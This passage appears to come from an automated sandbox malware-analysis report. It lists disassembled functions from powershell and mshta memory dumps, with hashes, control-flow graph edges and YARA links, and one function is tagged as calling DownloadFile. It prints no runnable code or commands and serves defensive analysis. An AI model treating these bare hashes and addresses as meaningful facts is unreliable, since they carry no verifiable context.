                                                                                              • Opcode Fuzzy Hash: fefb3978c1796a7e074846658e26f17aa5d99cafd11b13a388bc4a09a42954d4
                                                                                              • Instruction Fuzzy Hash: 4381012190EBD60FE753937858256A57FF1DF97250B1E41EBC4C9CB1A3D909AC0AC3A2
                                                                                              Function 000007FE89A7566D Relevance: 1.7, Strings: 1, Instructions: 465COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: V
                                                                                              • API String ID: 0-1342839628
                                                                                              • Opcode ID: 8f990c74bde9ca25ccf3ff8e97b3607dc2d435efc52b0cb14f1057682522f074
                                                                                              • Instruction ID: d8b2dab6c6ace30f0409aab27746c8bc98de322580c6b754dbb7b40ba98c53d6
                                                                                              • Opcode Fuzzy Hash: 8f990c74bde9ca25ccf3ff8e97b3607dc2d435efc52b0cb14f1057682522f074
                                                                                              • Instruction Fuzzy Hash: 00D1043180E7C91FD347972898156B67FA4EF87260F0911EBD48DCB0A3D619AD1AC3A2
                                                                                              Function 000007FE899A7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451861026.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadFile
                                                                                              • String ID:
                                                                                              • API String ID: 1407266417-0
                                                                                              • Opcode ID: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                              • Instruction ID: af85bc2c7650ea663aad5d2b185252519e16bf38f8e3e5b2e73dcd71df745be7
                                                                                              • Opcode Fuzzy Hash: 9d152b5c096c8588f3d5c03842f8cd64440e76f2d849722289f0ef4d4f592bed
                                                                                              • Instruction Fuzzy Hash: 4341F57180CB889FDB1ADB589C457AABBF0FB56321F0482AFD089D7562CB646806C781
                                                                                              Function 000007FE89A78549 Relevance: .7, Instructions: 705COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 107 7fe89a78549-7fe89a785f9 108 7fe89a78add-7fe89a78b96 107->108 109 7fe89a785ff-7fe89a78609 107->109 110 7fe89a7860b-7fe89a78618 109->110 111 7fe89a78622-7fe89a78629 109->111 110->111 115 7fe89a7861a-7fe89a78620 110->115 112 7fe89a7862b-7fe89a7863e 111->112 113 7fe89a78640 111->113 116 7fe89a78642-7fe89a78644 112->116 113->116 115->111 117 7fe89a78a58-7fe89a78a62 116->117 118 7fe89a7864a-7fe89a78656 116->118 122 7fe89a78a64-7fe89a78a74 117->122 123 7fe89a78a75-7fe89a78a85 117->123 118->108 121 7fe89a7865c-7fe89a78666 118->121 126 7fe89a78668-7fe89a78675 121->126 127 7fe89a78682-7fe89a78692 121->127 124 7fe89a78a87-7fe89a78a8b 123->124 125 7fe89a78a92-7fe89a78adc 123->125 124->125 126->127 129 7fe89a78677-7fe89a78680 126->129 127->117 134 7fe89a78698-7fe89a786cc 127->134 129->127 134->117 139 7fe89a786d2-7fe89a786de 134->139 139->108 140 7fe89a786e4-7fe89a786ee 139->140 141 7fe89a78707-7fe89a7870c 140->141 142 7fe89a786f0-7fe89a786fd 140->142 141->117 144 7fe89a78712-7fe89a78717 141->144 142->141 143 7fe89a786ff-7fe89a78705 142->143 143->141 144->117 145 7fe89a7871d-7fe89a78722 144->145 145->117 147 7fe89a78728-7fe89a78737 145->147 148 7fe89a78747 147->148 149 7fe89a78739-7fe89a78743 147->149 152 7fe89a7874c-7fe89a78759 148->152 150 7fe89a78763-7fe89a787ee 149->150 151 7fe89a78745 149->151 159 7fe89a787f0-7fe89a787fb 150->159 160 7fe89a78802-7fe89a78824 150->160 151->152 152->150 153 7fe89a7875b-7fe89a78761 152->153 153->150 159->160 161 7fe89a78826-7fe89a78830 160->161 162 7fe89a78834 160->162 163 7fe89a78850-7fe89a788de 161->163 164 7fe89a78832 161->164 165 7fe89a78839-7fe89a78846 162->165 172 7fe89a788e0-7fe89a788eb 163->172 173 7fe89a788f2-7fe89a78910 163->173 164->165 165->163 166 7fe89a78848-7fe89a7884e 165->166 166->163 172->173 174 7fe89a78920 173->174 175 7fe89a78912-7fe89a7891c 173->175 178 7fe89a78925-7fe89a78933 174->178 176 7fe89a7893d-7fe89a789cd 175->176 177 7fe89a7891e 175->177 185 7fe89a789cf-7fe89a789da 176->185 186 7fe89a789e1-7fe89a78a3a 176->186 177->178 178->176 179 7fe89a78935-7fe89a7893b 178->179 179->176 185->186 189 7fe89a78a42-7fe89a78a57 186->189
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04e7395453ea373c5db482dc0d4d8e10faca3a540647f0ff4d281faa28fcd79e
                                                                                              • Instruction ID: a57bb54a24261e815b2a5dc2bea573be520fda7eda493a9b1915ea966e1915b7
                                                                                              • Opcode Fuzzy Hash: 04e7395453ea373c5db482dc0d4d8e10faca3a540647f0ff4d281faa28fcd79e
                                                                                              • Instruction Fuzzy Hash: 4D22F43090CB895FE799EB2C84556697BE2FF8A344F2401EED48EC72A3DA24AC55C741
                                                                                              Function 000007FE89A74165 Relevance: .4, Instructions: 432COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 190 7fe89a74165-7fe89a741f4 191 7fe89a74457-7fe89a74516 190->191 192 7fe89a741fa-7fe89a74204 190->192 193 7fe89a74206-7fe89a74213 192->193 194 7fe89a7421d-7fe89a74222 192->194 193->194 195 7fe89a74215-7fe89a7421b 193->195 197 7fe89a74228-7fe89a7422b 194->197 198 7fe89a743fb-7fe89a74405 194->198 195->194 199 7fe89a7422d-7fe89a74240 197->199 200 7fe89a74242 197->200 201 7fe89a74407-7fe89a74413 198->201 202 7fe89a74414-7fe89a74424 198->202 205 7fe89a74244-7fe89a74246 199->205 200->205 206 7fe89a74426-7fe89a7442a 202->206 207 7fe89a74431-7fe89a74454 202->207 205->198 208 7fe89a7424c-7fe89a74280 205->208 206->207 207->191 214 7fe89a74297 208->214 215 7fe89a74282-7fe89a74295 208->215 217 7fe89a74299-7fe89a7429b 214->217 215->217 217->198 219 7fe89a742a1-7fe89a742a9 217->219 219->191 220 7fe89a742af-7fe89a742b9 219->220 221 7fe89a742bb-7fe89a742c8 220->221 222 7fe89a742d5-7fe89a742e5 220->222 221->222 223 7fe89a742ca-7fe89a742d3 221->223 222->198 226 7fe89a742eb-7fe89a7431c 222->226 223->222 226->198 229 7fe89a74322-7fe89a7434e 226->229 231 7fe89a74350-7fe89a74372 229->231 232 7fe89a74374 229->232 233 7fe89a74376-7fe89a74378 231->233 232->233 233->198 235 7fe89a7437e-7fe89a74386 233->235 236 7fe89a74396 235->236 237 7fe89a74388-7fe89a74392 235->237 241 7fe89a7439b-7fe89a743a8 236->241 238 7fe89a743b2-7fe89a743e1 237->238 239 7fe89a74394 237->239 245 7fe89a743e8-7fe89a743fa 238->245 239->241 241->238 242 7fe89a743aa-7fe89a743b0 241->242 242->238
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04121dd8ba6a47891dcf012f52e200de14ee2472430cdcc4fff1521073a37913
                                                                                              • Instruction ID: 751f3939d637c6ac0fbe3106570331dc534f20f5d60fd57048e667f00922a20e
                                                                                              • Opcode Fuzzy Hash: 04121dd8ba6a47891dcf012f52e200de14ee2472430cdcc4fff1521073a37913
                                                                                              • Instruction Fuzzy Hash: 00C1683090DBCA0FE74AA76C54116BA7FE2EF46744F1501EBD48EC71A3D618AC26C3A1
                                                                                              Function 000007FE89A70F61 Relevance: .3, Instructions: 308COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 246 7fe89a70f61-7fe89a70f96 247 7fe89a71098-7fe89a710dc 246->247 248 7fe89a70f9c-7fe89a70fa6 246->248 256 7fe89a710ed-7fe89a71124 247->256 257 7fe89a710de-7fe89a710e9 247->257 249 7fe89a70fa8-7fe89a70fb5 248->249 250 7fe89a70fbf-7fe89a70fee 248->250 249->250 252 7fe89a70fb7-7fe89a70fbd 249->252 250->247 261 7fe89a70ff4-7fe89a70ffe 250->261 252->250 259 7fe89a7112a-7fe89a7119e 256->259 260 7fe89a711c1-7fe89a711cb 256->260 257->256 279 7fe89a711a6-7fe89a711be 259->279 262 7fe89a711d8-7fe89a711e8 260->262 263 7fe89a711cd-7fe89a711d7 260->263 264 7fe89a71017-7fe89a71077 261->264 265 7fe89a71000-7fe89a7100d 261->265 266 7fe89a711ea-7fe89a711ee 262->266 267 7fe89a711f5-7fe89a7121a 262->267 276 7fe89a71079-7fe89a71084 264->276 277 7fe89a7108b-7fe89a71097 264->277 265->264 269 7fe89a7100f-7fe89a71015 265->269 266->267 269->264 276->277 279->260
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0be2b789e3bd11a7316a78662a5c762ca40170e4c6852bb2441783c4b4d38d53
                                                                                              • Instruction ID: 79f6c329d16720dba1d4cd5201d1870fabf9f30416e2d7ed85785fe86ab2f82b
                                                                                              • Opcode Fuzzy Hash: 0be2b789e3bd11a7316a78662a5c762ca40170e4c6852bb2441783c4b4d38d53
                                                                                              • Instruction Fuzzy Hash: 9391E220A0DBC90FE757973C58642657FE2EF4B254F2901EBC48ECB1A3EA189C5AC351

                                                                                              Non-executed Functions

                                                                                              Function 000007FE89A7352E Relevance: .3, Instructions: 331COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b3907e0014b28db3351010b321ae9e390cf548968deb6c9b58c999422fedd265
                                                                                              • Instruction ID: 5b3a3eee438105958a077073c2cf76a93f56031a0a63e0c44c8346de14d3b1b2
                                                                                              • Opcode Fuzzy Hash: b3907e0014b28db3351010b321ae9e390cf548968deb6c9b58c999422fedd265
                                                                                              • Instruction Fuzzy Hash: 2DA1352080EBC91FD747A77868142A67FF1EF4B254F1A01EBD48DCB1A3D6199D1AC362

                                                                                              Executed Functions

                                                                                              Function 022E0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000003.482124589.00000000022E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_3_22e0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: e5181ab03537cb1ffb0d74bc904cd51fe7f23bb89f3ece4bbeba0608932e0d80
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 022E0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000003.482124589.00000000022E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_3_22e0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: e5181ab03537cb1ffb0d74bc904cd51fe7f23bb89f3ece4bbeba0608932e0d80
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 022E0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000003.482124589.00000000022E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_3_22e0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: e5181ab03537cb1ffb0d74bc904cd51fe7f23bb89f3ece4bbeba0608932e0d80
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash: